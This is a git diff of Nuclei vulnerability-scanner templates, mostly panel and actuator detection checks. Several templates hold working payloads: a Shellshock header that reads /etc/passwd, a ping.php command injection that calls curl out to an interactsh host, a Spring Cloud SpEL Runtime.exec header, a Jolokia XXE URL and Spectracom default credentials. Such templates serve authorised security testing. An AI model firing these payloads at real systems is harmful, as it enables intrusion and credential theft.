Somfy + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/somfy-login.yaml b/nuclei-templates/Other/somfy-login.yaml deleted file mode 100644 index 2a3d4c40d1..0000000000 --- a/nuclei-templates/Other/somfy-login.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: somfy-login -info: - name: Somfy Login Page - author: DhiyaneshDK - severity: info - tags: panel -requests: - - method: GET - path: - - '{{BaseURL}}/m_login.htm' - matchers-condition: and - matchers: - - type: word - words: - - Home motion by Somfy - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/sonarqube-login-10376.yaml b/nuclei-templates/Other/sonarqube-login-10376.yaml deleted file mode 100644 index 1f9ab0f8cd..0000000000 --- a/nuclei-templates/Other/sonarqube-login-10376.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: sonarqube-login - -info: - name: SonarQube panel detect - author: dhiyaneshDk - severity: info - tags: panel,sonarqube - -requests: - - method: GET - path: - - "{{BaseURL}}/sessions/new" - - matchers: - - type: word - words: - - "SonarQube" - part: body diff --git a/nuclei-templates/Other/sonarqube-login.yaml b/nuclei-templates/Other/sonarqube-login.yaml new file mode 100644 index 0000000000..5bcb44b8e5 --- /dev/null +++ b/nuclei-templates/Other/sonarqube-login.yaml @@ -0,0 +1,15 @@ +id: sonarqube-login +info: + name: SonarQube panel detect + author: dhiyaneshDk + severity: info + tags: panel,sonarqube +requests: + - method: GET + path: + - "{{BaseURL}}/sessions/new" + matchers: + - type: word + words: + - "SonarQube" + part: body diff --git a/nuclei-templates/Other/sonarqube-public-projects-10379.yaml b/nuclei-templates/Other/sonarqube-public-projects-10379.yaml new file mode 100644 index 0000000000..a2aad16212 --- /dev/null +++ b/nuclei-templates/Other/sonarqube-public-projects-10379.yaml @@ -0,0 +1,23 @@ +id: sonarqube-public-projects +info: + name: Sonarqube with public projects + author: sickwell + severity: low + tags: sonarqube,misconfig + reference: https://next.sonarqube.com/sonarqube/web_api/api/components/suggestions?internal=true +requests: + - method: GET + path: + - "{{BaseURL}}/api/components/suggestions?recentlyBrowsed=" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - '"results":' + - '"items":' + - '"more":' + part: body + condition: and diff --git a/nuclei-templates/Other/sonarqube-public-projects.yaml b/nuclei-templates/Other/sonarqube-public-projects.yaml deleted file mode 100644 index f2f5e5dbf1..0000000000 --- a/nuclei-templates/Other/sonarqube-public-projects.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: sonarqube-public-projects -info: - name: Sonarqube with public projects - author: sickwell - severity: low - reference: - - https://next.sonarqube.com/sonarqube/web_api/api/components/suggestions?internal=true - tags: sonarqube,misconfig -requests: - - method: GET - path: - - "{{BaseURL}}/api/components/suggestions?recentlyBrowsed=" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - '"results":' - - '"items":' - - '"more":' - part: body - condition: and diff --git a/nuclei-templates/Other/sonarqube-token-10382.yaml b/nuclei-templates/Other/sonarqube-token-10382.yaml deleted file mode 100755 index b4f1b1b979..0000000000 --- a/nuclei-templates/Other/sonarqube-token-10382.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: sonarqube-token - -info: - name: SonarQube Token Disclosure - author: Ice3man - severity: info - tags: exposure,token,sonarqube - -requests: - - method: GET - path: - - "{{BaseURL}}" - extractors: - - type: regex - part: body - regex: - - "sonar.{0,50}(?:\"|'|`)?[0-9a-f]{40}(?:\"|'|`)?" diff --git a/nuclei-templates/Other/sonarqube-token.yaml b/nuclei-templates/Other/sonarqube-token.yaml new file mode 100644 index 0000000000..7fe08cc8f9 --- /dev/null +++ b/nuclei-templates/Other/sonarqube-token.yaml @@ -0,0 +1,15 @@ +id: sonarqube-token +info: + name: SonarQube Token Disclosure + author: Ice3man + severity: info + tags: exposure,token,sonarqube +requests: + - method: GET + path: + - "{{BaseURL}}" + extractors: + - type: regex + part: body + regex: + - "sonar.{0,50}(?:\"|'|`)?[0-9a-f]{40}(?:\"|'|`)?" diff --git a/nuclei-templates/Other/sonicwall-sslvpn-panel-10390.yaml b/nuclei-templates/Other/sonicwall-sslvpn-panel-10390.yaml new file mode 100644 index 0000000000..4025c28287 --- /dev/null +++ b/nuclei-templates/Other/sonicwall-sslvpn-panel-10390.yaml @@ -0,0 +1,16 @@ +id: sonicwall-sslvpn-panel + +info: + name: SonicWall Virtual Office SSLVPN Panel + author: PR3R00T + severity: info + tags: panel,sonicwall + +requests: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/welcome" + matchers: + - type: word + words: + - "Virtual Office" diff --git a/nuclei-templates/Other/sonicwall-sslvpn-panel.yaml b/nuclei-templates/Other/sonicwall-sslvpn-panel.yaml deleted file mode 100644 index 8f24565d45..0000000000 --- a/nuclei-templates/Other/sonicwall-sslvpn-panel.yaml +++ /dev/null @@ -1,14 +0,0 @@ -id: sonicwall-sslvpn-panel -info: - name: SonicWall Virtual Office SSLVPN Panel - author: PR3R00T - severity: info - tags: panel -requests: - - method: GET - path: - - "{{BaseURL}}/cgi-bin/welcome" - matchers: - - type: word - words: - - "Virtual Office" diff --git a/nuclei-templates/Other/sonicwall-sslvpn-shellshock-10393.yaml b/nuclei-templates/Other/sonicwall-sslvpn-shellshock-10393.yaml new file mode 100644 index 0000000000..08446f6447 --- /dev/null +++ b/nuclei-templates/Other/sonicwall-sslvpn-shellshock-10393.yaml @@ -0,0 +1,26 @@ +id: sonicwall-sslvpn-shellshock +info: + name: Sonicwall SSLVPN ShellShock RCE + author: PR3R00T + severity: critical + description: A vulnerability in Sonicwall SSLVPN contains a 'ShellShock' vulnerability which allows remote unauthenticated attackers to execute arbitrary commands. + reference: + - https://twitter.com/chybeta/status/1353974652540882944 + - https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/ + tags: shellshock,sonicwall,rce,vpn +requests: + - raw: + - | + GET /cgi-bin/jarrewrite.sh HTTP/1.1 + Host: {{Hostname}} + User-Agent: "() { :; }; echo ; /bin/bash -c 'cat /etc/passwd'" + Accept: */* + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + part: body + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/sonicwall-sslvpn-shellshock.yaml b/nuclei-templates/Other/sonicwall-sslvpn-shellshock.yaml deleted file mode 100644 index c80b9a1997..0000000000 --- a/nuclei-templates/Other/sonicwall-sslvpn-shellshock.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: sonicwall-sslvpn-shellshock -info: - name: Sonicwall SSLVPN - Remote Code Execution (ShellShock) - author: PR3R00T - severity: critical - description: | - Sonicwall SSLVPN contains a 'ShellShock' vulnerability which allows remote unauthenticated attackers to execute arbitrary commands. - reference: - - https://twitter.com/chybeta/status/1353974652540882944 - - https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-77 - tags: shellshock,sonicwall,rce,vpn -requests: - - raw: - - | - GET /cgi-bin/jarrewrite.sh HTTP/1.1 - Host: {{Hostname}} - User-Agent: "() { :; }; echo ; /bin/bash -c 'cat /etc/passwd'" - Accept: */* - matchers-condition: and - matchers: - - type: regex - part: body - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/05/30 diff --git a/nuclei-templates/Other/spark-webui-unauth-10400.yaml b/nuclei-templates/Other/spark-webui-unauth.yaml similarity index 100% rename from nuclei-templates/Other/spark-webui-unauth-10400.yaml rename to nuclei-templates/Other/spark-webui-unauth.yaml diff --git a/nuclei-templates/Other/spectracom-default-login-10403.yaml b/nuclei-templates/Other/spectracom-default-login-10403.yaml new file mode 100644 index 0000000000..07b09fe30a --- /dev/null +++ b/nuclei-templates/Other/spectracom-default-login-10403.yaml @@ -0,0 +1,36 @@ +id: spectracom-default-login + +info: + name: Spectracom Default Login + author: madrobot + severity: medium + tags: spectracom,default-login + +requests: + - raw: + - | + POST /users/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + data%5Bbutton%5D=submit&data%5BUser%5D%5Busername%5D={{username}}&data%5BUser%5D%5Bpassword%5D={{password}} + + payloads: + username: + - spadmin + password: + - admin123 + attack: pitchfork + + matchers-condition: and + matchers: + - type: word + words: + - "spectracom" + - "deleted" + part: header + condition: and + + - type: status + status: + - 302 diff --git a/nuclei-templates/Other/spectracom-default-login-10405.yaml b/nuclei-templates/Other/spectracom-default-login-10405.yaml deleted file mode 100644 index c3b83c4f09..0000000000 --- a/nuclei-templates/Other/spectracom-default-login-10405.yaml +++ /dev/null @@ -1,41 +0,0 @@ -id: spectracom-default-login -info: - name: Spectracom Default Login - author: madrobot - severity: high - description: Spectracom default admin credentials were discovered. - tags: spectracom,default-login - reference: - - https://orolia.com/manuals/NC/Content/NC_and_SS/Com/Topics/ADMIN/Passwords.htm - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cve-id: - cwe-id: CWE-522 -requests: - - raw: - - | - POST /users/login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - data%5Bbutton%5D=submit&data%5BUser%5D%5Busername%5D={{username}}&data%5BUser%5D%5Bpassword%5D={{password}} - payloads: - username: - - spadmin - password: - - admin123 - attack: pitchfork - matchers-condition: and - matchers: - - type: word - words: - - "spectracom" - - "deleted" - part: header - condition: and - - type: status - status: - - 302 - -# Enhanced by mp on 2022/03/11 diff --git a/nuclei-templates/Other/sphider-login-10409.yaml b/nuclei-templates/Other/sphider-login-10409.yaml new file mode 100644 index 0000000000..cdfd9f13e8 --- /dev/null +++ b/nuclei-templates/Other/sphider-login-10409.yaml @@ -0,0 +1,25 @@ +id: sphider-login + +info: + name: Sphider Admin Login + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6641 + tags: panel + +requests: + - method: GET + path: + - '{{BaseURL}}/admin/spider.php' + - '{{BaseURL}}/sphider/admin/admin.php' + - '{{BaseURL}}/search/admin/admin.php' + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + words: + - 'Sphider Admin Login' + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/sphider-login.yaml b/nuclei-templates/Other/sphider-login.yaml deleted file mode 100644 index 59e7e8b72e..0000000000 --- a/nuclei-templates/Other/sphider-login.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: sphider-login -info: - name: Sphider Admin Login - author: dhiyaneshDK - severity: info - reference: https://www.exploit-db.com/ghdb/6641 - tags: panel -requests: - - method: GET - path: - - '{{BaseURL}}/admin/spider.php' - - '{{BaseURL}}/sphider/admin/admin.php' - - '{{BaseURL}}/search/admin/admin.php' - matchers-condition: and - matchers: - - type: word - words: - - 'Sphider Admin Login' - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/spidercontrol-scada-server-info-10411.yaml b/nuclei-templates/Other/spidercontrol-scada-server-info-10411.yaml new file mode 100644 index 0000000000..68ebd6be19 --- /dev/null +++ b/nuclei-templates/Other/spidercontrol-scada-server-info-10411.yaml @@ -0,0 +1,30 @@ +id: spidercontrol-scada-server-info + +info: + name: SpiderControl SCADA Web Server Info Exposure + author: geeknik + description: Numerous, market-leading OEM manufacturers - from a wide variety of industries - rely on SpiderControl. + reference: https://spidercontrol.net/spidercontrol-inside/ + severity: high + tags: spidercontrol,scada,exposure + +requests: + - method: GET + path: + - '{{BaseURL}}/cgi-bin/GetSrvInfo.exe' + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "powered by SpiderControl" + - "LSWEBSERVER" + - "SCWEBSERVICES" + condition: and + extractors: + - type: kval + part: header + kval: + - Server diff --git a/nuclei-templates/Other/spidercontrol-scada-server-info-10413.yaml b/nuclei-templates/Other/spidercontrol-scada-server-info-10413.yaml deleted file mode 100644 index 9a520600ed..0000000000 --- a/nuclei-templates/Other/spidercontrol-scada-server-info-10413.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: spidercontrol-scada-server-info -info: - name: SpiderControl SCADA Web Server Info Exposure - author: geeknik - description: Numerous, market-leading OEM manufacturers - from a wide variety of industries - rely on SpiderControl. - reference: https://spidercontrol.net/spidercontrol-inside/ - severity: high - tags: spidercontrol,scada,exposure -requests: - - method: GET - path: - - '{{BaseURL}}/cgi-bin/GetSrvInfo.exe' - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "powered by SpiderControl" - - "LSWEBSERVER" - - "SCWEBSERVICES" - condition: and - extractors: - - type: kval - part: header - kval: - - Server diff --git a/nuclei-templates/Other/splunk-enterprise-panel-10415.yaml b/nuclei-templates/Other/splunk-enterprise-panel.yaml similarity index 100% rename from nuclei-templates/Other/splunk-enterprise-panel-10415.yaml rename to nuclei-templates/Other/splunk-enterprise-panel.yaml diff --git a/nuclei-templates/Other/splunk-login-10419.yaml b/nuclei-templates/Other/splunk-login-10419.yaml deleted file mode 100644 index 0e1184730e..0000000000 --- a/nuclei-templates/Other/splunk-login-10419.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: splunk-login -info: - name: Splunk SOAR - author: dhiyaneshDK - severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22Splunk+SOAR%22 - tags: panel,splunk -requests: - - method: GET - path: - - '{{BaseURL}}/login?next=/' - matchers-condition: and - matchers: - - type: word - words: - - 'Splunk SOAR' - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/splunk-login.yaml b/nuclei-templates/Other/splunk-login.yaml new file mode 100644 index 0000000000..1cdc420015 --- /dev/null +++ b/nuclei-templates/Other/splunk-login.yaml @@ -0,0 +1,23 @@ +id: splunk-login + +info: + name: Splunk SOAR + author: dhiyaneshDK + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22Splunk+SOAR%22 + tags: panel,splunk + +requests: + - method: GET + path: + - '{{BaseURL}}/login?next=/' + + matchers-condition: and + matchers: + - type: word + words: + - 'Splunk SOAR' + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/spon-ip-rce(1).yaml b/nuclei-templates/Other/spon-ip-rce.yaml similarity index 100% rename from nuclei-templates/Other/spon-ip-rce(1).yaml rename to nuclei-templates/Other/spon-ip-rce.yaml diff --git a/nuclei-templates/Other/sponip-network-system-ping-rce-10421.yaml b/nuclei-templates/Other/sponip-network-system-ping-rce-10421.yaml deleted file mode 100644 index e60a99688b..0000000000 --- a/nuclei-templates/Other/sponip-network-system-ping-rce-10421.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: sponip-network-system-ping-rce - -info: - name: Sponip Network System Ping RCE - author: pikpikcu - severity: critical - reference: https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247486018&idx=1&sn=d744907475a4ea9ebeb26338c735e3e9 - tags: sponip,rce,oast,network - -requests: - - raw: - - | - POST /php/ping.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - sondata[ip]=a|curl {{interactsh-url}}&jsondata[type]=1 - - matchers: - - type: word - part: interactsh_protocol - name: http - words: - - "http" diff --git a/nuclei-templates/Other/sponip-network-system-ping-rce-10422.yaml b/nuclei-templates/Other/sponip-network-system-ping-rce-10422.yaml new file mode 100644 index 0000000000..0e1ef52f1a --- /dev/null +++ b/nuclei-templates/Other/sponip-network-system-ping-rce-10422.yaml @@ -0,0 +1,30 @@ +id: sponip-network-system-ping-rce +info: + name: Sponip Network System Ping - Remote Code Execution + author: pikpikcu + severity: critical + description: | + Sponip Network System Ping is susceptible to remote code execution. + reference: + - https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247486018&idx=1&sn=d744907475a4ea9ebeb26338c735e3e9 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 + tags: sponip,rce,oast,network +requests: + - raw: + - | + POST /php/ping.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + sondata[ip]=a|curl {{interactsh-url}}&jsondata[type]=1 + matchers: + - type: word + part: interactsh_protocol + name: http + words: + - "http" + +# Enhanced by mp on 2022/05/30 diff --git a/nuclei-templates/Other/spoofable-spf-records-ptr-10425.yaml b/nuclei-templates/Other/spoofable-spf-records-ptr-10425.yaml deleted file mode 100644 index e1a76cfb37..0000000000 --- a/nuclei-templates/Other/spoofable-spf-records-ptr-10425.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: spoofable-spf-records-ptr - -info: - name: Find spoofable SPF records containing the PTR mechanism - author: binaryfigments - severity: info - description: Check if TXT records in DNS for SPF records that have the PTR mechanism that is spoofable. - tags: dns,spf - -dns: - - name: "{{FQDN}}" - type: TXT - - matchers: - - type: word - words: - - "v=spf1" - - " ptr " - condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/spoofable-spf-records-ptr-10427.yaml b/nuclei-templates/Other/spoofable-spf-records-ptr-10427.yaml new file mode 100644 index 0000000000..993131749a --- /dev/null +++ b/nuclei-templates/Other/spoofable-spf-records-ptr-10427.yaml @@ -0,0 +1,22 @@ +id: spoofable-spf-records-ptr +info: + name: Spoofable SPF Records with PTR Mechanism + author: binaryfigments + severity: info + description: SPF records in DNS containing a PTR mechanism are spoofable. + reference: + - https://www.digitalocean.com/community/tutorials/how-to-use-an-spf-record-to-prevent-spoofing-improve-e-mail-reliability + classification: + cwe-id: CWE-200 + tags: dns,spf +dns: + - name: "{{FQDN}}" + type: TXT + matchers: + - type: word + words: + - "v=spf1" + - " ptr " + condition: and + +# Enhanced by mp on 2022/03/14 diff --git a/nuclei-templates/Other/springForShell-CVE-2022-22963.yaml b/nuclei-templates/Other/springForShell-CVE-2022-22963.yaml new file mode 100644 index 0000000000..f28360d6a7 --- /dev/null +++ b/nuclei-templates/Other/springForShell-CVE-2022-22963.yaml @@ -0,0 +1,44 @@ +id: CVE-2022-22963 + +info: + name: CVE-2022-22963 - Spring Cloud RCE + author: rdnt + severity: critical + description: RCE on Spring cloud function SPEL + tags: cve,rce,spring,cve2022,injection + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-22963 + cwe-id: CWE-770 + +requests: + - method: POST + path: + - "{{RootURL}}/functionRouter" + - "{{RootURL}}/api/functionRouter" + - "{{RootURL}}/api/v1/functionRouter" + - "{{RootURL}}/../../../../../../functionRouter" + - "{{RootURL}}/../../../../../../;functionRouter" + - "{{RootURL}}/spring/functionRouter" + - "{{RootURL}}/admin/functionRouter" + - "{{RootURL}}/../../../../../../../../functionRouter" + - "{{RootURL}}../../../../../../../../api/functionRouter" + - "{{RootURL}}../../../../../../../../api/v1/functionRouter" + - "{{RootURL}}%2f%2e%2e%2f%2e%2e%2ffunctionRouter" + - "{{RootURL}}%2fspring%2ffunctionRouter" + - "{{RootURL}}%2fadmin%2functionRouter" + headers: + spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("") + Content-Type: application/x-www-form-urlencoded + body: exp + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'functionRouter' + - type: status + status: + - 500 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-22965.yaml b/nuclei-templates/Other/springForShell-CVE-2022-22965.yaml similarity index 100% rename from nuclei-templates/CVE-2022/cve-2022-22965.yaml rename to nuclei-templates/Other/springForShell-CVE-2022-22965.yaml diff --git a/nuclei-templates/Other/springboot-actuator-10433.yaml b/nuclei-templates/Other/springboot-actuator-10433.yaml deleted file mode 100644 index 005aad947e..0000000000 --- a/nuclei-templates/Other/springboot-actuator-10433.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: springboot-actuator - -info: - name: Detect Springboot Actuators - author: that_juan_,dwisiswant0,wdahlenb - severity: info - tags: tech,springboot,actuator - -requests: - - method: GET - path: - - "{{BaseURL}}" - - "{{BaseURL}}/actuator" - - "{{BaseURL}}/favicon.ico" - - "{{BaseURL}}/actuator/favicon.ico" - - stop-at-first-match: true - matchers-condition: or - matchers: - - type: word - part: body - words: - - '"_links":' - - '"self":' - - '"health"' - condition: and - - - type: dsl - name: "favicon" - dsl: - - "status_code==200 && (\"116323821\" == mmh3(base64_py(body)))" diff --git a/nuclei-templates/Other/springboot-actuator.yaml b/nuclei-templates/Other/springboot-actuator.yaml new file mode 100644 index 0000000000..e40ac9a553 --- /dev/null +++ b/nuclei-templates/Other/springboot-actuator.yaml @@ -0,0 +1,27 @@ +id: springboot-actuator +info: + name: Detect Springboot Actuators + author: that_juan_,dwisiswant0,wdahlenb + severity: info + tags: tech,springboot,actuator +requests: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/actuator" + - "{{BaseURL}}/favicon.ico" + - "{{BaseURL}}/actuator/favicon.ico" + stop-at-first-match: true + matchers-condition: or + matchers: + - type: word + part: body + words: + - '"_links":' + - '"self":' + - '"health"' + condition: and + - type: dsl + name: "favicon" + dsl: + - "status_code==200 && (\"116323821\" == mmh3(base64_py(body)))" diff --git a/nuclei-templates/Other/springboot-actuators-jolokia-xxe-10428.yaml b/nuclei-templates/Other/springboot-actuators-jolokia-xxe-10428.yaml deleted file mode 100644 index 8df6d19797..0000000000 --- a/nuclei-templates/Other/springboot-actuators-jolokia-xxe-10428.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: springboot-actuators-jolokia-xxe -info: - name: Spring Boot Actuators (Jolokia) XXE - author: dwisiswant0 - severity: high -requests: - - method: GET - path: - - "{{BaseURL}}:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml" - - "{{BaseURL}}/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "http:\\/\\/nonexistent:31337\\/logback.xml" - - "reloadByURL" - - "JoranException" - condition: and - part: body - - type: word - words: - - "X-Application-Context" - part: header diff --git a/nuclei-templates/Other/springboot-actuators-jolokia-xxe-10432.yaml b/nuclei-templates/Other/springboot-actuators-jolokia-xxe-10432.yaml new file mode 100644 index 0000000000..8d86dd794f --- /dev/null +++ b/nuclei-templates/Other/springboot-actuators-jolokia-xxe-10432.yaml @@ -0,0 +1,31 @@ +id: springboot-actuators-jolokia-xxe + +info: + name: Spring Boot Actuators (Jolokia) XXE + author: dwisiswant0,ipanda + severity: high + description: A vulnerability in Spring Boot Actuators's 'jolokia' endpoint allows remote attackers to perform an XML External Entities (XXE) attack and include content stored on a remote server as if it was its own. This has the potential to allow the execution of arbitrary code and/or disclosure of sensitive information from the target machine. + reference: + - https://www.veracode.com/blog/research/exploiting-spring-boot-actuators + - https://github.com/mpgn/Spring-Boot-Actuator-Exploit + tags: springboot,jolokia,xxe + +requests: + - method: GET + path: + - "{{BaseURL}}/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml" + - "{{BaseURL}}/actuator/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/random:915!/logback.xml" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - "http:\\/\\/nonexistent:31337\\/logback.xml" + - "reloadByURL" + - "JoranException" + condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/springboot-autoconfig-10437.yaml b/nuclei-templates/Other/springboot-autoconfig-10437.yaml new file mode 100644 index 0000000000..e120711b1e --- /dev/null +++ b/nuclei-templates/Other/springboot-autoconfig-10437.yaml @@ -0,0 +1,28 @@ +id: springboot-autoconfig + +info: + name: Detect Springboot autoconfig Actuator + author: pussycat0x + severity: low + description: Displays an auto-configuration report showing all auto-configuration candidates and the reason why they 'were' or 'were not' applied. + tags: springboot,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/autoconfig" + - "{{BaseURL}}/actuator/autoconfig" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "positiveMatches" + - "AuditAutoConfiguration#auditListener" + - "EndpointAutoConfiguration#beansEndpoint" + condition: and + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/springboot-autoconfig.yaml b/nuclei-templates/Other/springboot-autoconfig.yaml deleted file mode 100644 index 22ed254bed..0000000000 --- a/nuclei-templates/Other/springboot-autoconfig.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: springboot-autoconfig -info: - name: Detect Springboot autoconfig Actuator - author: pussycat0x - severity: low - description: Displays an auto-configuration report showing all auto-configuration candidates and the reason why they 'were' or 'were not' applied. - tags: springboot,exposure -requests: - - method: GET - path: - - "{{BaseURL}}/autoconfig" - - "{{BaseURL}}/actuator/autoconfig" - matchers-condition: and - matchers: - - type: word - part: body - words: - - "positiveMatches" - - "AuditAutoConfiguration#auditListener" - - "EndpointAutoConfiguration#beansEndpoint" - condition: and - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/springboot-beans-10439.yaml b/nuclei-templates/Other/springboot-beans-10439.yaml new file mode 100644 index 0000000000..1ed764c5e9 --- /dev/null +++ b/nuclei-templates/Other/springboot-beans-10439.yaml @@ -0,0 +1,32 @@ +id: springboot-beans +info: + name: Detect Springboot Beans Actuator + author: ajaysenr + severity: low + description: Displays a complete list of all the Spring beans in the application + tags: springboot,exposure +requests: + - method: GET + path: + - "{{BaseURL}}/beans" + - "{{BaseURL}}/actuator/beans" + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"type"' + - '"beans"' + - '"dependencies"' + - '"scope"' + condition: and + - type: status + status: + - 200 + - type: word + words: + - "application/json" + - "application/vnd.spring-boot.actuator" + - "application/vnd.spring-boot.actuator.v1+json" + condition: or + part: header diff --git a/nuclei-templates/Other/springboot-beans-10440.yaml b/nuclei-templates/Other/springboot-beans-10440.yaml deleted file mode 100644 index 3bcbd4f668..0000000000 --- a/nuclei-templates/Other/springboot-beans-10440.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: springboot-beans -info: - name: Detect Springboot Beans Actuator - author: ajaysenr - severity: low - description: Displays a complete list of all the Spring beans in the application - tags: springboot,exposure -requests: - - method: GET - path: - - "{{BaseURL}}/beans" - - "{{BaseURL}}/actuator/beans" - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - '"type"' - - '"beans"' - - '"dependencies"' - - '"scope"' - condition: and - - type: status - status: - - 200 - - type: word - words: - - "application/json" - - "application/vnd.spring-boot.actuator" - - "application/vnd.spring-boot.actuator.v1+json" - condition: or - part: header diff --git a/nuclei-templates/Other/springboot-configprops-10445.yaml b/nuclei-templates/Other/springboot-configprops-10443.yaml similarity index 100% rename from nuclei-templates/Other/springboot-configprops-10445.yaml rename to nuclei-templates/Other/springboot-configprops-10443.yaml diff --git a/nuclei-templates/Other/spring-boot-actuators.yaml b/nuclei-templates/Other/springboot-detect.yaml similarity index 100% rename from nuclei-templates/Other/spring-boot-actuators.yaml rename to nuclei-templates/Other/springboot-detect.yaml diff --git a/nuclei-templates/Other/springboot-dump-10446.yaml b/nuclei-templates/Other/springboot-dump-10446.yaml deleted file mode 100644 index 6002fe9b4a..0000000000 --- a/nuclei-templates/Other/springboot-dump-10446.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: springboot-dump -info: - name: Detect Springboot Dump Actuator - author: pussycat0x - severity: low - description: Performs a thread dump - tags: springboot,exposure -requests: - - method: GET - path: - - "{{BaseURL}}/dump" - - "{{BaseURL}}/actuator/dump" - matchers-condition: and - matchers: - - type: word - part: body - words: - - "threadName" - - "threadId" - - "waitedTime" - - "lockName" - - "stackTrace" - - "methodName" - condition: and - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/springboot-dump-10447.yaml b/nuclei-templates/Other/springboot-dump-10447.yaml new file mode 100644 index 0000000000..a4d6571c3d --- /dev/null +++ b/nuclei-templates/Other/springboot-dump-10447.yaml @@ -0,0 +1,31 @@ +id: springboot-dump + +info: + name: Detect Springboot Dump Actuator + author: pussycat0x + severity: low + description: Performs a thread dump + tags: springboot,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/dump" + - "{{BaseURL}}/actuator/dump" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "threadName" + - "threadId" + - "waitedTime" + - "lockName" + - "stackTrace" + - "methodName" + condition: and + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/springboot-env-10450.yaml b/nuclei-templates/Other/springboot-env-10450.yaml index 5fed76e721..a13d6f7bc0 100644 --- a/nuclei-templates/Other/springboot-env-10450.yaml +++ b/nuclei-templates/Other/springboot-env-10450.yaml @@ -1,15 +1,19 @@ id: springboot-env + info: name: Detect Springboot Env Actuator author: that_juan_,dwisiswant0,wdahlenb,philippedelteil severity: low description: Sensitive environment variables may not be masked tags: springboot,exposure + requests: - method: GET path: - "{{BaseURL}}/env" - "{{BaseURL}}/actuator/env" + + stop-at-first-match: true matchers-condition: and matchers: - type: word @@ -18,20 +22,23 @@ requests: - "applicationConfig" - "activeProfiles" condition: or + - type: word part: body words: - "server.port" - "local.server.port" condition: or - - type: status - status: - - 200 + - type: word + part: header words: - "application/json" - "application/vnd.spring-boot.actuator" - "application/vnd.spring-boot.actuator.v1+json" - "application/vnd.spring-boot.actuator.v2+json" condition: or - part: header + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/springboot-gateway-10453.yaml b/nuclei-templates/Other/springboot-gateway-10453.yaml index 